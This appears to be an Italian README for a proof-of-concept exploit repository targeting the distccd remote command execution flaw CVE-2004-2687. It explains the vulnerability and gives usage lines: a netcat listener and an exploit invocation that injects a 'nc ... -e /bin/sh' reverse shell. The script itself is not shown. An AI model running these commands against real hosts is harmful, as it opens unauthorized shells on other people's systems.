
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Aggiornato a Python3
Panoramica
Questo repository contiene un exploit Proof of Concept (PoC) per la vulnerabilità distccd identificata come CVE-2004-2687. La vulnerabilità esiste nel demone distccd, che fa parte del sistema di compilazione distribuita C/C++ distcc. Quando configurato in modo improprio, distccd consente ad attaccanti remoti di eseguire comandi arbitrari sul server senza alcuna autenticazione.
Dettagli della vulnerabilità
distcc è progettato per distribuire attività di compilazione su più macchine per accelerare il processo di build. Tuttavia, se il demone distccd non è adeguatamente protetto, espone una vulnerabilità di esecuzione remota di codice (RCE). Ciò accade perché il demone è in ascolto su una porta di rete e accetta comandi da qualsiasi client, consentendo loro di eseguire comandi shell sul server come utente che esegue il demone.
Alla vulnerabilità è stato assegnato il CVE-2004-2687 e riguarda le versioni di distccd precedenti alla 3.1. Quando sfruttata, un attaccante può ottenere accesso shell alla macchina vulnerabile, portando alla potenziale compromissione dell'intero sistema.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
Vulnerabilità :

Exploit :
